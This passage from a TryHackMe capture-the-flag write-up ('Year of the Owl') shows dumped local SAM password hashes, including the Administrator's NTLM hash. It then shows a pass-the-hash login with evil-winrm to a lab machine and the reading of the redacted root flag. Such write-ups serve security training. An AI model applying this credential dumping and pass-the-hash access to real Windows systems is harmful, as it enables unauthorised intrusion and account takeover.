[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6bc99ede9edcfecf9662fb0c0ddcfa7a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:39a21b273f0cfd3d1541695564b4511b:::
Jareth:1001:aad3b435b51404eeaad3b435b51404ee:5a6103a83d2a94be8fd17161dfd4555a:::
[*] Cleaning up...
Now we can use evil-winrm again to log in using the Administrator hash, luckily we don’t need to crack it as I tried that without success!
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ ~/Tools/evil-winrm/evil-winrm.rb -u Administrator -H 6bc99ede9edcfecf9662fb0c0ddcfa7a -i 10.10.162.177
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2020 2:19 AM 80 admin.txt
Excellent, now let’s grab that root flag
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type admin.txt
THM{REDACTED}
We got it, #2:THM{REDACTED}